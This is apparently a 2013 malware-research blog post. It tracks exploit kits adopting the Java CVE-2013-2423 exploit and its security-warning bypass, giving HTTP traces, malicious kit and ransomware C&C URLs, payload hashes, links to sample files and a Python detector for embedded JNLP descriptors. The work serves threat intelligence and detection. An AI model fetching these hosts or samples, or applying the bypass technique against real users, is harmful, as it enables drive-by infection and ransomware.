2013-04-23 - Exploit Integration
CVE-2013-2423 integrating Exploit Kits
One week after the Java 7u21 patch, the vulnerability is being exploited in mass blind attacks.
(First alert came from Timo Hirvonen with CrimeBoss and later CritXPack/SafePack. Will update for these EKs as soon as I land on them.)
Cool EK:
CVE-2013-2423 successful path in Cool EK 2013-04-23 |
GET http://lekarskiejowlslight.ahmedpekin .net/works-softly.htm
200 OK (text/html)
GET http://lekarskiejowlslight.ahmedpekin .net/hopeful_orchestra-surveyor_remove.jar
200 OK (application/java-archive) 9339cb68dd4a1301f8b84da55bacd6b4
CVE-2013-2423 in Cool EK Jar |
GET http://95.211.[bip]/getqq.jpg c795ac9a7a84930c4da54439026556c6 Reveton as usual.
200 OK (application/x-msdownload)
<edit1 2013-04-26>
Sweet-Orange :
CVE-2013-2423 positive path in Sweet Orange 2013-04-26 |
200 OK (text/html)
<edit5 2013-04-27> Security Bypass has been added.
Looks like this:
Security bypass implemented in Sweet Orange 2013-04-27 |
</edit5>
GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/bDCoZGmn.jar
200 OK (application/x-java-archive) d4a716a6434462ddd1b99a85f3d9cf87
CVE-2013-2423 in SWT |
GET http://prioritiesinformationlockdown .net/upgrade/uploads/photo/KOrJjsK.jar
200 OK (application/x-java-archive) 49ca9dcbf4cc7176bb656ded3eb03dba
GET http://prioritiesinformationlockdown .net/iraq.php?setup=750&humor=598&star=4&virus=629&entry=171&paper=545&stars=451&intm=257&books=550&myguest=958
200 OK (application/octet-stream) Decoded payload : f94c16dc1c399849e37064e17c5337e1 (Ransomware c&c http://utrento .com/picture.php )
Undefined (for now) Ransomware landing for UK |
<edit3 2013-04-27>
Neutrino :
"Добавлен новый эксплоит, пробив приятно поднялся ;)"
translated as :
Added a new exploit, breaking up nicely ;)
CVE-2013-2423 in Neutrino 2013-04-27 with Security Bypass |
Security Bypass (as explained by Security Immunity) in Neutrino after some decoding |
Jnlp After Base64 decode |
GET http://evaluation-man .net/ldeiyxlmeiujjn?fqemlffr=5884689
200 OK (text/html)
GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)
GET http://evaluation-man .net/scripts/js/plugin_detector.js
200 OK (application/x-javascript)
POST http://evaluation-man .net/cvwrssa
200 OK (text/html)
GET http://evaluation-man .net/eqtmw?hvvsxlyebdkj=517ba030aaa2cc8561032cc5
200 OK (application/java-archive) 4387db4a1da8f8f68df4369f8e6d46b6
CVE-2013-2423 in Neutrino Jar |
GET http://evaluation-man .net/puvpdxcfdwntco?htigpfblxyx=517ba030aaa2cc8561032cc5
200 OK (application/octet-stream) Decoded payload : a69ffadf3d021f3edfb7b811e2fcb753 Urausy
Part of Urausy LU Design 2013-04-27 |
File: Neutrino_CVE-2013-2423.zip (OwnCloud via goo.gl)
</edit3>
<edit4 2013-04-27>
Sakura :
CVE-2013-2423 & Security Bypass successful path in Sakura EK |
200 OK (text/html)
Security Bypass in Sakura (after partial deobfus) - 2013-04-27 |
GET http://ef4g.stencilmaster1 .com:88/page/important_whole_mile.php
200 OK (application/x-java-archive) b7c19737bcbeb0613ade20b71e2797fe
CVE-2013-2423 in Sakura Jar file 2013-04-27 |
200 OK (application/octet-stream) Decoded payload : 1ecc8081e6fe50c886735c45e788d16d
Part of Urausy NL Design 2013-04-27 |
Files : Sakura_Landing_Jar_Payload_CVE-2013-2423.zip (OwnCloud via goo.gl)
</edit4>
<edit6 2013-04-27>
Styx :
At least 3 hours providing that jar without infecting... it now appears to be fully operational.
Successful CVE-2013-2423 + Security bypass in Styx + Payload Urausy Call Home |
200 OK (text/html)
GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/jrr.html
200 OK (text/html)
Embedded jnlp for Security Bypass |
GET http://1perfotas.gotgeeks .com/kgMXp60Bral0l2gu0T3h311sSh0gspW12nyO0jyQj0Clcm0APFy0tlNV06MeW0KUSX/sdghsHHj.jar
200 OK (text/html) 702ad790017148b8eedd46ce5599a06f
CVE-2013-2423 in Styx Jar 2013-04-27 |
GET http://1perfotas.gotgeeks .com/OoTtsV0poEU0xnad0KaY910BMP0MRvW0emfi0nW3n0rEFd06afI0di5J0QjCx0OufD06IHF0CViI0ZVum0V3tm0zzAk14xMn0TcLD01PmR0nee80H9JU0Rdwk12WwY09mps0ZYSm0nX5o0OhKa17Z8N16eY5126Nc0hQ6m0ML3m0gjjR0EYoV0tEYB14CSM0GpRt0unAj0dUrn0vhxG0htLK12MMq0SNVP0OGdP/Er3jvhs7jf.exe?fJ2pf=XUaPp&h=13
200 OK (application/octet-stream) Payload decoded (for now...) 1f9d504d0c3ad25ca42fbc661070d075 Urausy again...
Part of Urausy US Design 2013-04-27 |
</edit6>
<edit7 2013-04-30>
Redkit:
Spotted by @UnicornSec on 2013-04-29 |
CVE-2013-2423 in Redkit 2013-04-30 |
200 OK (text/html)
GET http://electricfireplaceheater .net/roh.jnlp
200 OK (text/html)
GET http://electricfireplaceheater .net/aae.jnlp
200 OK (text/html)
Redkit jnlp for Security Bypass 2013-04-30 |
GET http://electricfireplaceheater .net/qv3.jar
200 OK (application/java-archive) 5623b9a385e3eec21bf4d5d2fe63e45d
CVE-2013-2423 in Redkit Jar 2013-04-30 |
200 OK (application/octet-stream)
Out of scope, but here are the payloads:
1: 8586611fc023048abac469bfe681117b 2: cf0ae96521b423ebe10593e7de1f6a9c (it's Karagny i think)
3: b9e6d133e163b0d0e4efb144316d528e 4: 280683d62667a7bd8411565fd212707f
5: 5de26a11e59a84368db5f56cc9c997cc Zaccess 6: 13bd23da493896001f6d107f1bf1afc0
Files : Redkit_CVE-2013-2423_2013-04-30.zip (OwnCloud via goo.gl)
Nuclear Pack :
Announced on multiple underground forums since 2013-04-27:
добавлен новый Java exploit
пробив увеличился в 2 раза!!
Работает тих без окон!!!
Translated by Google as:
added a new Java exploit
breaking increased by 2 times!
Runs quiet with no windows!
Thanks to Chris Wakelin, who spotted it and shared the referrer.
CVE-2013-2423 successful path In Nuclear Pack 2013-04-30 |
200 OK (text/html)
http://wepawet.iseclab.org/view.php?hash=6d3b3650005593ab6955750c2f7e2097&type=js
Landings interpreted by Wepawet |
Base64 decode of the Security Bypass "zone" |
200 OK (application/java) ac29a615ec7ff5d3f238effca6e9095d
CVE-2013-2423 in a Nuclear Pack jar 2013-04-30 |
200 OK (application/octet-stream) a2fcdd67062b8cd866b4a642277f24e2 Citadel
GET http://exhaustedpcscreen .biz:38895/f/1367323505/539816c0e7725da387899afdc64a602c/2d3a14952063b1bba31bd5613d62d58e/2/2
200 OK (application/octet-stream)
SofosFO/StampEK :
CVE-2013-2423 positive path in SofosFO/Stamp EK |
200 OK (text/html)
GET http://cubicle.zeusfte .biz/kkethh1yogmrErparmDQGwe4gerparGg/FGZa2../prosperity.php5
200 OK (text/html)
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/901212121255
200 OK (text/html)
Security Bypass in SofosFO/Stamp EK 2013-04-30 |
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/name.jar
200 OK (text/html)
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/9013312341/double.jar
200 OK (application/java-archive)
CVE-2013-2423 part in jar from SofosFO/StampEK |
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/name.jar
200 OK (text/html)
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/95555555555551/1704114
200 OK (application/java-archive) Decoded Payload : 0bfc916bd2c95a98234b19c8976686a5 (Reveton...seems Cool EK is facing troubles. Distribution moved to SofosFO and Sweet Orange).
Piece of Reveton FR Design 2013-04 |
Connection to Reveton C&C 2013-04-30 |
Entry point: FG00
GET http://cubicle.zeusfte .biz/e8topnz1ogmrErpprmDQGwe4gerpagrp/MyApplet.class
200 OK (text/html)
Files : SofosFO_CVE-2013-2423_Reveton_SecuByP.zip (OwnCloud via goo.gl)
</edit7>
<edit8 2013-05-01>
Sibhost :
CVE-2013-2423 successful path in Sibhost (URLs removed because it's a "forged" link) |
200 OK (text/html)
Security Bypass (embedded jnlp in the landing) in Sibhost 2013-05-01 |
GET http://[Redacted]/deployJava.js
200 OK (application/javascript)
GET http://[Redacted]/deployJava.js
200 OK (application/javascript)
GET http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu2.zip
200 OK (application/octet-stream) e041223ecd039e5a01f8e4cac5ca9c96
CVE-2013-2423 in Sibhost Jar 2013-05-01 (including encoded payload - Urausy) |
Decoded payload : 3bce54da0e5a8f1c56787c60b389ff56 (Urausy as always on this Exploit kit)
Part of Urausy LU design 2013-05-01 |
POST http://[Redacted]/f9Jzvl7ISTKuzd4f4OyG1LEyb0V41RpxfMyLu?id=2
200 OK (text/html) (<- stats callback)
</edit8>
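Several kits above (Neutrino's "Jnlp After Base64 decode", Sibhost's "embedded jnlp in the landing") carry the security-warning bypass as a base64-encoded JNLP descriptor inside an applet parameter. The following detector is an added example, not code from this post or from any kit: it walks the applet/param tags of a landing page, decodes any `jnlp_embedded` value, and reports the jar references the descriptor points at. The sample HTML and JNLP body are constructed placeholders (the jar name reuses one seen in the Styx trace above).

```python
"""Flag base64-embedded JNLP descriptors in suspected exploit-kit landing pages."""
import base64
import binascii
import re
from html.parser import HTMLParser

# Applet parameter that the Java plugin honours for an inline (base64) descriptor.
EMBEDDED_PARAM = "jnlp_embedded"


class _ParamCollector(HTMLParser):
    """Collects attributes of <applet>, <object>, <embed> and <param> tags."""

    def __init__(self):
        super().__init__()
        self.params = []

    def handle_starttag(self, tag, attrs):
        if tag in ("param", "applet", "embed", "object"):
            self.params.append(dict(attrs))


def decode_embedded_jnlp(blob):
    """Return the decoded JNLP XML if blob is valid base64 holding a <jnlp> root, else None."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except (binascii.Error, ValueError):
        return None
    text = raw.decode("utf-8", errors="replace")
    return text if re.search(r"<jnlp\b", text, re.I) else None


def find_embedded_jnlp(html):
    """Return [(jar_hrefs, jnlp_xml), ...] for every embedded descriptor found in html."""
    p = _ParamCollector()
    p.feed(html)
    hits = []
    for attrs in p.params:
        if (attrs.get("name") or "").lower() == EMBEDDED_PARAM:
            xml = decode_embedded_jnlp(attrs.get("value") or "")
            if xml:
                hits.append((re.findall(r'<jar[^>]*\bhref="([^"]+)"', xml, re.I), xml))
    return hits


# Constructed sample: a minimal landing page with an inline descriptor (placeholder JNLP body).
SAMPLE_JNLP = ('<jnlp spec="1.0"><resources><j2se version="1.7+"/>'
               '<jar href="sdghsHHj.jar" main="true"/></resources>'
               '<applet-desc name="a" main-class="Main" width="1" height="1"/></jnlp>')
SAMPLE_HTML = ('<applet code="Main" archive="sdghsHHj.jar" width="1" height="1">'
               '<param name="jnlp_embedded" value="%s"/></applet>'
               % base64.b64encode(SAMPLE_JNLP.encode()).decode())

if __name__ == "__main__":
    for jars, _ in find_embedded_jnlp(SAMPLE_HTML):
        print("embedded JNLP found, jars:", jars)
```

Running it over a saved landing page gives a quick triage signal: a base64 applet parameter that decodes to a `<jnlp>` root is worth a closer look at the referenced jar.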
<edit9 2013-05-06>
WhiteHole :
CVE-2013-2423 in WhiteHole 2013-05-06 |
200 OK (text/html)
Security Bypass in WhiteHole 2013-05-06 |
GET http://1367825417.hopto .org/temp/newyear/deployJava.js
200 OK (application/javascript)
GET http://1367825417.hopto .org/temp/newyear/2b075/?java=98
200 OK (text/html)
GET http://1367825417.hopto .org/temp/newyear/JavaN.jar?java=98
200 OK (application/java-archive) b36e2a4326d80fdd605650363cae50a9
GET http://1367825417.hopto .org/temp/newyear/JavaZ.jar?java=98
200 OK (application/java-archive) a46b973d293fc787905a0d6d9d103eb3 < CVE-2013-2423
CVE-2013-2423 in WhiteHole Jar |
GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=98
302 Found to http://1367825417.hopto.org/temp/softl98ii.exe
GET http://1367825417.hopto .org/temp/softl98ii.exe
200 OK (application/x-msdos-program) 1d7dc35322dcc21e84bd72eafc2b167d < Urausy
Part of Urausy BE Design 2013-05-06 |
GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=98
504 Gateway Time-out (text/html)
GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=9802
504 Gateway Time-out (text/html)
GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=9802
504 Gateway Time-out (text/html)
GET http://1367825417.hopto .org/temp/newyear/418116071/?whole=9803
504 Gateway Time-out (text/html)
GET http://1367825417.hopto .org/temp/newyear/1043553559/?whole=9803
504 Gateway Time-out (text/html)
Files : WhiteHole_CVE-2013-2423.zip (OwnCloud via Goo.gl)
</edit9>
Reading :
CVE-2013-2423 on mitre
CVE-2013-2423 Metasploit Module
Java is So Confusing... - Trustwave/Spiderlabs - Anat Davidi - 2013-04-19
Java 7 Update 21 - IKVM.Net Weblog - 2013-04-17
Post Publication Readings :
Yet Another Java Security Warning Bypass - Immunity - 2013-04-24 - Esteban Guillardoy
The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423) - Security Obscurity - 2013-04-26
K.I.A. – Java CVE 2013-2423 Via New and Improved Cool EK - Anup Ghosh - Invincea - 2013-04-26